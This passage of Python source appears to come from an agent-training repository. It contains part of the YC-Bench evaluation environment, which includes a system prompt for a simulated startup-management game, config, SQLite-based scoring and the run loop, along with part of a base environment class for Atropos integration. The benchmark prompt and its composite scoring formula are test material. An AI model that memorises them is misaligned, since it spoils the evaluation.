- `yc-bench report monthly` -- monthly P&L
### Act
- `yc-bench task accept --task-id UUID` -- accept from market
- `yc-bench task assign --task-id UUID --employee-id UUID` -- assign employee
- `yc-bench task dispatch --task-id UUID` -- start work (needs >=1 assignment)
- `yc-bench task cancel --task-id UUID --reason "text"` -- cancel (prestige penalty)
- `yc-bench sim resume` -- advance simulation clock
### Memory (persists across context truncation)
- `yc-bench scratchpad read` -- read your persistent notes
- `yc-bench scratchpad write --content "text"` -- overwrite notes
- `yc-bench scratchpad append --content "text"` -- append to notes
- `yc-bench scratchpad clear` -- clear notes
## Strategy Guidelines
1. **Specialise in 2-3 domains** to climb the prestige ladder faster and unlock
high-reward tasks. Don't spread thin across all 4 domains early on.
2. **Focus employees** -- assigning one employee to many tasks halves their
throughput per additional task. Keep assignments concentrated.
3. **Use the scratchpad** to track your strategy, upcoming deadlines, and
employee assignments. This persists even if conversation context is truncated.
4. **Monitor runway** -- always know how many months of payroll you can cover.
Accept high-reward tasks before payroll dates.
5. **Don't over-accept** -- taking too many tasks and missing deadlines cascades
into prestige loss, locking you out of profitable contracts.
6. Use `finance ledger` and `report monthly` to track revenue trends.
## Your Turn
Each turn:
1. Call `yc-bench company status` and `yc-bench task list` to orient yourself.
2. Check for completed tasks and pending deadlines.
3. Browse market for profitable tasks within your prestige level.
4. Accept, assign, and dispatch tasks strategically.
5. Call `yc-bench sim resume` to advance time.
6. Repeat until the simulation ends.
Think step by step before acting."""
# Starting funds in cents ($250,000)
INITIAL_FUNDS_CENTS = 25_000_000
# Default horizon per preset (years)
_PRESET_HORIZONS = {
"tutorial": 1,
"easy": 1,
"medium": 1,
"hard": 1,
"nightmare": 1,
"fast_test": 1,
"default": 3,
"high_reward": 1,
}
# =============================================================================
# Configuration
# =============================================================================
class YCBenchEvalConfig(HermesAgentEnvConfig):
"""
Configuration for the YC-Bench evaluation environment.
Extends HermesAgentEnvConfig with YC-Bench-specific settings for
preset selection, seed control, scoring, and simulation parameters.
"""
presets: List[str] = Field(
default=["fast_test", "medium", "hard"],
description="YC-Bench preset names to evaluate.",
)
seeds: List[int] = Field(
default=[1, 2, 3],
description="Random seeds -- each preset x seed = one run.",
)
run_timeout: int = Field(
default=3600,
description="Maximum wall-clock seconds per run. Default 60 minutes.",
)
survival_weight: float = Field(
default=0.5,
description="Weight of survival (0/1) in composite score.",
)
funds_weight: float = Field(
default=0.5,
description="Weight of normalised final funds in composite score.",
)
db_dir: str = Field(
default="/tmp/yc_bench_dbs",
description="Directory for per-run SQLite databases.",
)
horizon_years: Optional[int] = Field(
default=None,
description=(
"Simulation horizon in years. If None (default), inferred from "
"preset name (1 year for most, 3 for 'default')."
),
)
company_name: str = Field(
default="BenchCo",
description="Name of the simulated company.",
)
start_date: str = Field(
default="01/01/2025",
description="Simulation start date in MM/DD/YYYY format (yc-bench convention).",
)
# =============================================================================
# Scoring helpers
# =============================================================================
def _read_final_score(db_path: str) -> Dict[str, Any]:
"""
Read final game state from a YC-Bench SQLite database.
Returns dict with final_funds_cents (int), survived (bool),
terminal_reason (str).
Note: yc-bench table names are plural -- 'companies' not 'company',
'sim_events' not 'simulation_log'.
"""
if not os.path.exists(db_path):
logger.warning("DB not found at %s", db_path)
return {
"final_funds_cents": 0,
"survived": False,
"terminal_reason": "db_missing",
}
conn = None
try:
conn = sqlite3.connect(db_path)
cur = conn.cursor()
# Read final funds from the 'companies' table
cur.execute("SELECT funds_cents FROM companies LIMIT 1")
row = cur.fetchone()
funds = row[0] if row else 0
# Determine terminal reason from 'sim_events' table
terminal_reason = "unknown"
try:
cur.execute(
"SELECT event_type FROM sim_events "
"WHERE event_type IN ('bankruptcy', 'horizon_end') "
"ORDER BY scheduled_at DESC LIMIT 1"
)
event_row = cur.fetchone()
if event_row:
terminal_reason = event_row[0]
except sqlite3.OperationalError:
# Table may not exist if simulation didn't progress
pass
survived = funds >= 0 and terminal_reason != "bankruptcy"
return {
"final_funds_cents": funds,
"survived": survived,
"terminal_reason": terminal_reason,
}
except Exception as e:
logger.error("Failed to read DB %s: %s", db_path, e)
return {
"final_funds_cents": 0,
"survived": False,
"terminal_reason": f"db_error: {e}",
}
finally:
if conn:
conn.close()
def _compute_composite_score(
final_funds_cents: int,
survived: bool,
survival_weight: float = 0.5,
funds_weight: float = 0.5,
initial_funds_cents: int = INITIAL_FUNDS_CENTS,
) -> float:
"""
Compute composite score from survival and final funds.
Score = survival_weight * survival_score
+ funds_weight * normalised_funds_score
Normalised funds uses log-scale relative to initial capital:
- funds <= 0: 0.0
- funds == initial: ~0.15
- funds == 10x: ~0.52
- funds == 100x: 1.0
"""
survival_score = 1.0 if survived else 0.0
if final_funds_cents <= 0:
funds_score = 0.0
else:
max_ratio = 100.0
ratio = final_funds_cents / max(initial_funds_cents, 1)
funds_score = min(math.log1p(ratio) / math.log1p(max_ratio), 1.0)
return survival_weight * survival_score + funds_weight * funds_score
# =============================================================================
# Main Environment
# =============================================================================
class YCBenchEvalEnv(HermesAgentBaseEnv):
"""
YC-Bench long-horizon agent benchmark environment (eval-only).
Each eval item is a (preset, seed) pair. The environment initialises the
simulation via ``yc-bench sim init`` (NOT ``yc-bench run`` which would start
a competing built-in agent loop). The HermesAgentLoop then drives the
interaction by calling individual yc-bench CLI commands via the terminal tool.
After the agent loop ends, the SQLite DB is read to extract the final score.
Scoring:
composite = 0.5 * survival + 0.5 * normalised_funds
"""
name = "yc-bench"
env_config_cls = YCBenchEvalConfig
@classmethod
def config_init(cls) -> Tuple[YCBenchEvalConfig, List[APIServerConfig]]:
env_config = YCBenchEvalConfig(
enabled_toolsets=["terminal"],
disabled_toolsets=None,
distribution=None,
max_agent_turns=200,
max_token_length=32000,
agent_temperature=0.0,
system_prompt=YC_BENCH_SYSTEM_PROMPT,
terminal_backend="local",
terminal_timeout=60,
presets=["fast_test", "medium", "hard"],
seeds=[1, 2, 3],
run_timeout=3600,
survival_weight=0.5,
funds_weight=0.5,
db_dir="/tmp/yc_bench_dbs",
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
use_wandb=True,
wandb_name="yc-bench",
ensure_scores_are_not_same=False,
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4.6",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
# =========================================================================
# Setup
# =========================================================================
async def setup(self):
"""Verify yc-bench is installed and build the eval matrix."""
# Verify yc-bench CLI is available
try:
result = subprocess.run(
["yc-bench", "--help"], capture_output=True, text=True, timeout=10
)
if result.returncode != 0:
raise FileNotFoundError
except (FileNotFoundError, subprocess.TimeoutExpired):
raise RuntimeError(
"yc-bench CLI not found. Install with:\n"
' pip install "hermes-agent[yc-bench]"\n'
"Or: git clone https://github.com/collinear-ai/yc-bench "
"&& cd yc-bench && pip install -e ."
)
print("yc-bench CLI verified.")
# Build eval matrix: preset x seed
self.all_eval_items = [
{"preset": preset, "seed": seed}
for preset in self.config.presets
for seed in self.config.seeds
]
self.iter = 0
os.makedirs(self.config.db_dir, exist_ok=True)
self.eval_metrics: List[Tuple[str, float]] = []
# Streaming JSONL log for crash-safe result persistence
log_dir = os.path.join(os.path.dirname(__file__), "logs")
os.makedirs(log_dir, exist_ok=True)
run_ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self._streaming_path = os.path.join(log_dir, f"samples_{run_ts}.jsonl")
self._streaming_file = open(self._streaming_path, "w")
self._streaming_lock = threading.Lock()
print(f"\nYC-Bench eval matrix: {len(self.all_eval_items)} runs")
for item in self.all_eval_items:
print(f" preset={item['preset']!r} seed={item['seed']}")
print(f"Streaming results to: {self._streaming_path}\n")
def _save_result(self, result: Dict[str, Any]):
"""Write a single run result to the streaming JSONL file immediately."""
if not hasattr(self, "_streaming_file") or self._streaming_file.closed:
return
with self._streaming_lock:
self._streaming_file.write(
json.dumps(result, ensure_ascii=False, default=str) + "\n"
)
self._streaming_file.flush()
# =========================================================================
# Training pipeline stubs (eval-only -- not used)
# =========================================================================
async def get_next_item(self):
item = self.all_eval_items[self.iter % len(self.all_eval_items)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
preset = item["preset"]
seed = item["seed"]
return (
f"A new YC-Bench simulation has been initialized "
f"(preset='{preset}', seed={seed}).\n"
f"Your company '{self.config.company_name}' is ready.\n\n"
"Begin by calling:\n"
"1. `yc-bench company status` -- see your starting funds and prestige\n"
"2. `yc-bench employee list` -- see your team and their skills\n"
"3. `yc-bench market browse --required-prestige-lte 1` -- find tasks "
"you can take\n\n"
"Then accept 2-3 tasks, assign employees, dispatch them, and call "
"`yc-bench sim resume` to advance time. Repeat this loop until the "
"simulation ends (horizon reached or bankruptcy)."
)
async def compute_reward(self, item, result, ctx) -> float:
return 0.0
async def collect_trajectories(self, item):
return None, []
async def score(self, rollout_group_data):
return None
# =========================================================================
# Per-run evaluation
# =========================================================================
async def rollout_and_score_eval(self, eval_item: Dict[str, Any]) -> Dict:
"""
Evaluate a single (preset, seed) run.
1. Sets DATABASE_URL and YC_BENCH_EXPERIMENT env vars
2. Initialises the simulation via ``yc-bench sim init`` (NOT ``run``)
3. Runs HermesAgentLoop with terminal tool
4. Reads SQLite DB to compute final score
5. Returns result dict with survival, funds, and composite score
"""
preset = eval_item["preset"]
seed = eval_item["seed"]
run_id = str(uuid.uuid4())[:8]
run_key = f"{preset}_seed{seed}_{run_id}"
from tqdm import tqdm
tqdm.write(f" [START] preset={preset!r} seed={seed} (run_id={run_id})")
run_start = time.time()
# Isolated DB per run -- prevents cross-run state leakage
db_path = os.path.join(self.config.db_dir, f"yc_bench_{run_key}.db")
os.environ["DATABASE_URL"] = f"sqlite:///{db_path}"
os.environ["YC_BENCH_EXPERIMENT"] = preset
# Determine horizon: explicit config override > preset lookup > default 1
horizon = self.config.horizon_years or _PRESET_HORIZONS.get(preset, 1)
try:
# ----------------------------------------------------------
# Step 1: Initialise the simulation via CLI
# IMPORTANT: We use `sim init`, NOT `yc-bench run`.
# `yc-bench run` starts yc-bench's own LLM agent loop (via
# LiteLLM), which would compete with our HermesAgentLoop.
# `sim init` just sets up the world and returns.
# ----------------------------------------------------------
init_cmd = [
"yc-bench", "sim", "init",
"--seed", str(seed),
"--start-date", self.config.start_date,
"--company-name", self.config.company_name,
"--horizon-years", str(horizon),
]
init_result = subprocess.run(
init_cmd, capture_output=True, text=True, timeout=30,
)
if init_result.returncode != 0:
error_msg = (init_result.stderr or init_result.stdout).strip()
raise RuntimeError(f"yc-bench sim init failed: {error_msg}")
tqdm.write(f" Simulation initialized (horizon={horizon}yr)")
# ----------------------------------------------------------
# Step 2: Run the HermesAgentLoop
# ----------------------------------------------------------
tools, valid_names = self._resolve_tools_for_group()
messages: List[Dict[str, Any]] = [
{"role": "system", "content": YC_BENCH_SYSTEM_PROMPT},
{"role": "user", "content": self.format_prompt(eval_item)},
]
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=run_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# ----------------------------------------------------------
# Step 3: Read final score from the simulation DB
# ----------------------------------------------------------
score_data = _read_final_score(db_path)
final_funds = score_data["final_funds_cents"]
survived = score_data["survived"]
terminal_reason = score_data["terminal_reason"]
composite = _compute_composite_score(
final_funds_cents=final_funds,
survived=survived,
survival_weight=self.config.survival_weight,
funds_weight=self.config.funds_weight,
)
elapsed = time.time() - run_start
status = "SURVIVED" if survived else "BANKRUPT"
if final_funds >= 0:
funds_str = f"${final_funds / 100:,.0f}"
else:
funds_str = f"-${abs(final_funds) / 100:,.0f}"
tqdm.write(
f" [{status}] preset={preset!r} seed={seed} "
f"funds={funds_str} score={composite:.3f} "
f"turns={result.turns_used} ({elapsed:.0f}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": survived,
"final_funds_cents": final_funds,
"final_funds_usd": final_funds / 100,
"terminal_reason": terminal_reason,
"composite_score": composite,
"turns_used": result.turns_used,
"finished_naturally": result.finished_naturally,
"elapsed_seconds": elapsed,
"db_path": db_path,
"messages": result.messages,
}
self._save_result(out)
return out
except Exception as e:
elapsed = time.time() - run_start
logger.error("Run %s failed: %s", run_key, e, exc_info=True)
tqdm.write(
f" [ERROR] preset={preset!r} seed={seed}: {e} ({elapsed:.0f}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": False,
"final_funds_cents": 0,
"final_funds_usd": 0.0,
"terminal_reason": f"error: {e}",
"composite_score": 0.0,
"turns_used": 0,
"error": str(e),
"elapsed_seconds": elapsed,
}
self._save_result(out)
return out
# =========================================================================
# Evaluate
# =========================================================================
async def _run_with_timeout(self, item: Dict[str, Any]) -> Dict:
"""Wrap a single rollout with a wall-clock timeout."""
preset = item["preset"]
seed = item["seed"]
try:
return await asyncio.wait_for(
self.rollout_and_score_eval(item),
timeout=self.config.run_timeout,
)
except asyncio.TimeoutError:
from tqdm import tqdm
tqdm.write(
f" [TIMEOUT] preset={preset!r} seed={seed} "
f"(exceeded {self.config.run_timeout}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": False,
"final_funds_cents": 0,
"final_funds_usd": 0.0,
"terminal_reason": f"timeout ({self.config.run_timeout}s)",
"composite_score": 0.0,
"turns_used": 0,
"error": "timeout",
}
self._save_result(out)
return out
async def evaluate(self, *args, **kwargs) -> None:
"""
Run YC-Bench evaluation over all (preset, seed) combinations.
Runs sequentially -- each run is 100-500 turns, parallelising would
be prohibitively expensive and cause env var conflicts.
"""
start_time = time.time()
from tqdm import tqdm
# --- tqdm-compatible logging handler (TB2 pattern) ---
class _TqdmHandler(logging.Handler):
def emit(self, record):
try:
tqdm.write(self.format(record))
except Exception:
self.handleError(record)
root = logging.getLogger()
handler = _TqdmHandler()
handler.setFormatter(
logging.Formatter("%(levelname)s %(name)s: %(message)s")
)
root.handlers = [handler]
for noisy in ("httpx", "openai"):
logging.getLogger(noisy).setLevel(logging.WARNING)
# --- Print config summary ---
print(f"\n{'='*60}")
print("Starting YC-Bench Evaluation")
print(f"{'='*60}")
print(f" Presets: {self.config.presets}")
print(f" Seeds: {self.config.seeds}")
print(f" Total runs: {len(self.all_eval_items)}")
print(f" Max turns/run: {self.config.max_agent_turns}")
print(f" Run timeout: {self.config.run_timeout}s")
print(f"{'='*60}\n")
results = []
pbar = tqdm(
total=len(self.all_eval_items), desc="YC-Bench", dynamic_ncols=True
)
try:
for item in self.all_eval_items:
result = await self._run_with_timeout(item)
results.append(result)
survived_count = sum(1 for r in results if r.get("survived"))
pbar.set_postfix_str(
f"survived={survived_count}/{len(results)}"
)
pbar.update(1)
except (KeyboardInterrupt, asyncio.CancelledError):
tqdm.write("\n[INTERRUPTED] Stopping evaluation...")
pbar.close()
try:
from tools.terminal_tool import cleanup_all_environments
cleanup_all_environments()
except Exception:
pass
if hasattr(self, "_streaming_file") and not self._streaming_file.closed:
self._streaming_file.close()
return
pbar.close()
end_time = time.time()
# --- Compute metrics ---
valid = [r for r in results if r is not None]
if not valid:
print("Warning: No valid results.")
return
total = len(valid)
survived_total = sum(1 for r in valid if r.get("survived"))
survival_rate = survived_total / total if total else 0.0
avg_score = (
sum(r.get("composite_score", 0) for r in valid) / total
if total
else 0.0
)
preset_results: Dict[str, List[Dict]] = defaultdict(list)
for r in valid:
preset_results[r["preset"]].append(r)
eval_metrics = {
"eval/survival_rate": survival_rate,
"eval/avg_composite_score": avg_score,
"eval/total_runs": total,
"eval/survived_runs": survived_total,
"eval/evaluation_time_seconds": end_time - start_time,
}
for preset, items in sorted(preset_results.items()):
ps = sum(1 for r in items if r.get("survived"))
pt = len(items)
pa = (
sum(r.get("composite_score", 0) for r in items) / pt
if pt
else 0
)
key = preset.replace("-", "_")
eval_metrics[f"eval/survival_rate_{key}"] = ps / pt if pt else 0
eval_metrics[f"eval/avg_score_{key}"] = pa
self.eval_metrics = [(k, v) for k, v in eval_metrics.items()]
# --- Print summary ---
print(f"\n{'='*60}")
print("YC-Bench Evaluation Results")
print(f"{'='*60}")
print(
f"Overall survival rate: {survival_rate:.1%} "
f"({survived_total}/{total})"
)
print(f"Average composite score: {avg_score:.4f}")
print(f"Evaluation time: {end_time - start_time:.1f}s")
print("\nPer-preset breakdown:")
for preset, items in sorted(preset_results.items()):
ps = sum(1 for r in items if r.get("survived"))
pt = len(items)
pa = (
sum(r.get("composite_score", 0) for r in items) / pt
if pt
else 0
)
print(f" {preset}: {ps}/{pt} survived avg_score={pa:.4f}")
for r in items:
status = "SURVIVED" if r.get("survived") else "BANKRUPT"
funds = r.get("final_funds_usd", 0)
print(
f" seed={r['seed']} [{status}] "
f"${funds:,.0f} "
f"score={r.get('composite_score', 0):.3f}"
)
print(f"{'='*60}\n")
# --- Log results ---
samples = [
{k: v for k, v in r.items() if k != "messages"} for r in valid
]
try:
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
generation_parameters={
"temperature": self.config.agent_temperature,
"max_tokens": self.config.max_token_length,
"max_agent_turns": self.config.max_agent_turns,
},
)
except Exception as e:
print(f"Error logging results: {e}")
# --- Cleanup (TB2 pattern) ---
if hasattr(self, "_streaming_file") and not self._streaming_file.closed:
self._streaming_file.close()
print(f"Results saved to: {self._streaming_path}")
try:
from tools.terminal_tool import cleanup_all_environments
cleanup_all_environments()
except Exception:
pass
try:
from environments.agent_loop import _tool_executor
_tool_executor.shutdown(wait=False, cancel_futures=True)
except Exception:
pass
# =========================================================================
# Wandb logging
# =========================================================================
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log YC-Bench-specific metrics to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
for k, v in self.eval_metrics:
wandb_metrics[k] = v
self.eval_metrics = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
YCBenchEvalEnv.cli()

View File

@@ -0,0 +1,670 @@
"""
HermesAgentBaseEnv -- Abstract Base Environment for Hermes-Agent + Atropos
Provides the Atropos integration plumbing that all hermes-agent environments share:
- Two-mode operation (OpenAI server for Phase 1, VLLM ManagedServer for Phase 2)
- Per-group toolset/distribution resolution
- Agent loop orchestration via HermesAgentLoop
- ToolContext creation for reward functions
- ScoredDataGroup construction from ManagedServer state
Subclasses only need to implement:
setup() -- Load dataset, initialize state
get_next_item() -- Return the next item from the dataset
format_prompt() -- Convert a dataset item into the user message
compute_reward() -- Score the rollout (has full ToolContext access)
evaluate() -- Periodic evaluation
"""
import asyncio
import json
import logging
import os
import sys
import uuid
from abc import abstractmethod
from pathlib import Path
from typing import Any, Dict, List, Optional, Set, Tuple, Union
# Ensure the hermes-agent repo root is on sys.path so that imports like
# `from model_tools import ...` and `from environments.X import ...` work
# regardless of where the script is invoked from.
_repo_root = Path(__file__).resolve().parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from dotenv import load_dotenv
from pydantic import Field
# Load API keys from hermes-agent/.env so all environments can access them
_env_path = _repo_root / ".env"
if _env_path.exists():
load_dotenv(dotenv_path=_env_path)
# Apply monkey patches for async-safe tool operation inside Atropos's event loop.
# This patches SwerexModalEnvironment to use a background thread instead of
# asyncio.run(), which would deadlock inside Atropos. Safe for normal CLI too.
from environments.patches import apply_patches
apply_patches()
from atroposlib.envs.base import (
BaseEnv,
BaseEnvConfig,
ScoredDataGroup,
ScoredDataItem,
)
from atroposlib.envs.server_handling.server_manager import (
APIServerConfig,
ServerBaseline,
ServerManager,
)
from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult, HermesAgentLoop
from environments.tool_context import ToolContext
# Import hermes-agent toolset infrastructure
from model_tools import get_tool_definitions
from toolset_distributions import sample_toolsets_from_distribution
logger = logging.getLogger(__name__)
class HermesAgentEnvConfig(BaseEnvConfig):
"""
Configuration for hermes-agent Atropos environments.
Extends BaseEnvConfig with agent-specific settings for toolsets,
terminal backend, dataset loading, and tool call parsing.
"""
# --- Toolset configuration ---
# Mutually exclusive: use either enabled_toolsets OR distribution
enabled_toolsets: Optional[List[str]] = Field(
default=None,
description="Explicit list of hermes toolsets to enable (e.g., ['terminal', 'file', 'web']). "
"If None and distribution is also None, all available toolsets are enabled.",
)
disabled_toolsets: Optional[List[str]] = Field(
default=None,
description="Toolsets to disable. Applied as a filter on top of enabled_toolsets or distribution.",
)
distribution: Optional[str] = Field(
default=None,
description="Name of a toolset distribution from toolset_distributions.py "
"(e.g., 'development', 'terminal_tasks'). Sampled once per group. "
"Mutually exclusive with enabled_toolsets.",
)
# --- Agent loop configuration ---
max_agent_turns: int = Field(
default=30,
description="Maximum number of LLM calls (tool-calling iterations) per rollout.",
)
system_prompt: Optional[str] = Field(
default=None,
description="System prompt for the agent. Tools are handled via the tools= parameter, "
"not embedded in the prompt text.",
)
agent_temperature: float = Field(
default=1.0,
description="Sampling temperature for agent generation during rollouts.",
)
# --- Terminal backend ---
terminal_backend: str = Field(
default="local",
description="Terminal backend: 'local', 'docker', 'modal', 'daytona', 'ssh', 'singularity'. "
"Modal or Daytona recommended for production RL (cloud isolation per rollout).",
)
terminal_timeout: int = Field(
default=120,
description="Per-command timeout in seconds for terminal tool calls. "
"Commands exceeding this are killed. Increase for tasks with long-running "
"commands (compilation, pip install, etc.).",
)
terminal_lifetime: int = Field(
default=3600,
description="Sandbox inactivity lifetime in seconds. The cleanup thread kills "
"sandboxes that have been idle longer than this. Must be longer than "
"the longest gap between tool calls (e.g., waiting for LLM response).",
)
# --- Dataset ---
dataset_name: Optional[str] = Field(
default=None,
description="HuggingFace dataset name. Optional if tasks are defined inline.",
)
dataset_split: str = Field(
default="train",
description="Dataset split to use.",
)
prompt_field: str = Field(
default="prompt",
description="Which field in the dataset contains the prompt.",
)
# --- Thread pool ---
tool_pool_size: int = Field(
default=128,
description="Thread pool size for tool execution. Each concurrent task needs a "
"thread for tool calls. Must be large enough for parallel evaluation. "
"Too small = thread pool starvation.",
)
# --- Phase 2: Tool call parsing ---
tool_call_parser: str = Field(
default="hermes",
description="Tool call parser name for Phase 2 (VLLM server type). "
"Ignored in Phase 1 (OpenAI server type where VLLM parses natively). "
"Options: hermes, mistral, llama3_json, qwen, deepseek_v3, etc.",
)
# --- Provider-specific parameters ---
# Passed as extra_body to the OpenAI client's chat.completions.create() call.
# Useful for OpenRouter provider preferences, transforms, route settings, etc.
# Example YAML:
# extra_body:
# provider:
# ignore: ["DeepInfra", "Fireworks"]
# order: ["Together"]
# transforms: ["middle-out"]
extra_body: Optional[Dict[str, Any]] = Field(
default=None,
description="Extra body parameters passed to the OpenAI client's "
"chat.completions.create(). Used for OpenRouter provider preferences, "
"transforms, and other provider-specific settings.",
)
class HermesAgentBaseEnv(BaseEnv):
"""
Abstract base environment for hermes-agent Atropos integration.
Handles two modes of operation:
- Phase 1 (OpenAI server type): Uses server.chat_completion() directly.
The server (VLLM, SGLang, OpenRouter, OpenAI) handles tool call parsing
and reasoning extraction natively. DummyManagedServer provides placeholder
tokens. Good for SFT data gen, verifier testing, evaluation.
- Phase 2 (VLLM server type): Uses ManagedServer for exact token IDs + logprobs
via /generate. Client-side tool call parser reconstructs structured tool_calls
from raw output. Full RL training capability.
Subclasses must implement:
setup() -- Load dataset, initialize state
get_next_item() -- Return the next item to roll out
format_prompt() -- Convert a dataset item into the user message string
compute_reward() -- Score the rollout using ToolContext
evaluate() -- Periodic evaluation
"""
name: Optional[str] = "hermes-agent"
env_config_cls = HermesAgentEnvConfig
def __init__(
self,
config: HermesAgentEnvConfig,
server_configs: Union[ServerBaseline, List[APIServerConfig]],
slurm=False,
testing=False,
):
super().__init__(config, server_configs, slurm, testing)
# Set terminal environment variables so hermes tools pick them up.
# These can all be overridden per-environment via config fields instead
# of requiring users to set shell env vars.
if config.terminal_backend:
os.environ["TERMINAL_ENV"] = config.terminal_backend
os.environ["TERMINAL_TIMEOUT"] = str(config.terminal_timeout)
os.environ["TERMINAL_LIFETIME_SECONDS"] = str(config.terminal_lifetime)
print(
f"🖥️ Terminal: backend={config.terminal_backend}, "
f"timeout={config.terminal_timeout}s, lifetime={config.terminal_lifetime}s"
)
# Resize the agent loop's thread pool for tool execution.
# This must be large enough for the number of concurrent tasks
# (e.g., 89 parallel TB2 eval tasks each need a thread for tool calls).
from environments.agent_loop import resize_tool_pool
resize_tool_pool(config.tool_pool_size)
# Set tool_parser on the ServerManager so ManagedServer uses it
# for bidirectional tool call translation (raw text ↔ OpenAI tool_calls).
if hasattr(self.server, 'tool_parser'):
self.server.tool_parser = config.tool_call_parser
print(f"🔧 Tool parser: {config.tool_call_parser}")
# Current group's resolved tools (set in collect_trajectories)
self._current_group_tools: Optional[Tuple[List[Dict], Set[str]]] = None
# Tool error tracking for wandb logging
self._tool_error_buffer: List[Dict[str, Any]] = []
# =========================================================================
# Toolset resolution (per-group)
# =========================================================================
def _resolve_tools_for_group(self) -> Tuple[List[Dict[str, Any]], Set[str]]:
"""
Resolve toolsets for a group. Called once in collect_trajectories(),
then shared by all collect_trajectory() calls in the group.
If distribution is set, samples probabilistically.
If enabled_toolsets is set, uses that explicit list.
disabled_toolsets is applied as a filter on top.
Returns:
(tool_schemas, valid_tool_names) tuple
"""
config = self.config
if config.distribution:
group_toolsets = sample_toolsets_from_distribution(config.distribution)
logger.info("Sampled toolsets from '%s': %s", config.distribution, group_toolsets)
else:
group_toolsets = config.enabled_toolsets # None means "all available"
if group_toolsets is None:
logger.warning(
"enabled_toolsets is None -- loading ALL tools including messaging. "
"Set explicit enabled_toolsets for RL training."
)
tools = get_tool_definitions(
enabled_toolsets=group_toolsets,
disabled_toolsets=config.disabled_toolsets,
quiet_mode=True,
)
valid_names = {t["function"]["name"] for t in tools} if tools else set()
logger.info("Resolved %d tools for group: %s", len(valid_names), sorted(valid_names))
return tools, valid_names
# =========================================================================
# Server mode detection
# =========================================================================
def _use_managed_server(self) -> bool:
"""
Determine if we should use ManagedServer (Phase 2) or direct server (Phase 1).
Phase 2 (ManagedServer) is used when the server type is 'vllm' or 'sglang',
which go through the /generate endpoint for exact token tracking.
Phase 1 (direct server) is used for 'openai' server type, which uses
/v1/chat/completions with native tool call parsing.
"""
if not self.server.servers:
return False
server = self.server.servers[0]
# If the server is an OpenAI server (not VLLM/SGLang), use direct mode
from atroposlib.envs.server_handling.openai_server import OpenAIServer
return not isinstance(server, OpenAIServer)
# =========================================================================
# Core Atropos integration
# =========================================================================
async def collect_trajectories(
self, item: Item
) -> Tuple[
Union[Optional[ScoredDataGroup], List[Optional[ScoredDataGroup]]],
List[Item],
]:
"""
Override collect_trajectories to resolve toolsets once per group,
then delegate to the standard group-level collection.
The default BaseEnv.collect_trajectories() calls collect_trajectory()
group_size times in parallel. We resolve tools once here and store
them for all those calls to use.
"""
# Resolve toolsets for this group (shared by all rollouts in the group)
self._current_group_tools = self._resolve_tools_for_group()
# Delegate to the default implementation which calls collect_trajectory()
# group_size times via asyncio.gather
return await super().collect_trajectories(item)
# =========================================================================
# Wandb rollout display -- format trajectories nicely
# =========================================================================
@staticmethod
def _format_trajectory_for_display(messages: List[Dict[str, Any]]) -> str:
"""
Format a conversation's messages into a readable trajectory string
for wandb rollout tables. Shows tool calls, tool results, and reasoning
in a structured way instead of raw token decoding.
"""
parts = []
for msg in messages:
role = msg.get("role", "unknown")
content = msg.get("content", "")
if role == "system":
parts.append(f"[SYSTEM]\n{content}")
elif role == "user":
parts.append(f"[USER]\n{content}")
elif role == "assistant":
# Show reasoning if present
reasoning = msg.get("reasoning_content", "")
if reasoning:
# Truncate long reasoning for display
if len(reasoning) > 300:
reasoning = reasoning[:300] + "..."
parts.append(f"[ASSISTANT thinking]\n{reasoning}")
# Show content
if content:
parts.append(f"[ASSISTANT]\n{content}")
# Show tool calls
tool_calls = msg.get("tool_calls", [])
for tc in tool_calls:
func = tc.get("function", {})
name = func.get("name", "?")
args = func.get("arguments", "{}")
# Truncate long arguments for display
if len(args) > 200:
args = args[:200] + "..."
parts.append(f"[TOOL CALL] {name}({args})")
elif role == "tool":
tool_id = msg.get("tool_call_id", "")
result = content
# Truncate long tool results for display
if len(result) > 500:
result = result[:500] + "..."
parts.append(f"[TOOL RESULT] {result}")
return "\n\n".join(parts)
async def add_rollouts_for_wandb(
self,
scored_data,
item=None,
):
"""
Override to show formatted trajectories with tool calls visible,
instead of raw token decoding which loses all structure.
"""
num_keep = self.config.num_rollouts_per_group_for_logging
if num_keep == -1:
num_keep = self.config.group_size
group = []
for i in range(min(num_keep, len(scored_data.get("scores", [])))):
score = scored_data["scores"][i]
# Use messages if available for rich display
messages = None
if scored_data.get("messages") and i < len(scored_data["messages"]):
messages = scored_data["messages"][i]
if messages:
text = self._format_trajectory_for_display(messages)
elif scored_data.get("tokens") and i < len(scored_data["tokens"]):
text = self.tokenizer.decode(scored_data["tokens"][i])
else:
text = "(no data)"
group.append((text, score))
self.rollouts_for_wandb.append(group)
if len(self.rollouts_for_wandb) > self.config.num_rollouts_to_keep:
self.rollouts_for_wandb.pop(0)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log base metrics including tool errors to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
# Log tool error stats
if self._tool_error_buffer:
wandb_metrics["train/tool_errors_count"] = len(self._tool_error_buffer)
# Log error details as a summary string (tables can crash wandb on tmp cleanup)
error_summaries = []
for err in self._tool_error_buffer:
error_summaries.append(
f"[turn {err['turn']}] {err['tool']}({err['args'][:80]}) -> {err['error'][:150]}"
)
wandb_metrics["train/tool_error_details"] = "\n".join(error_summaries)
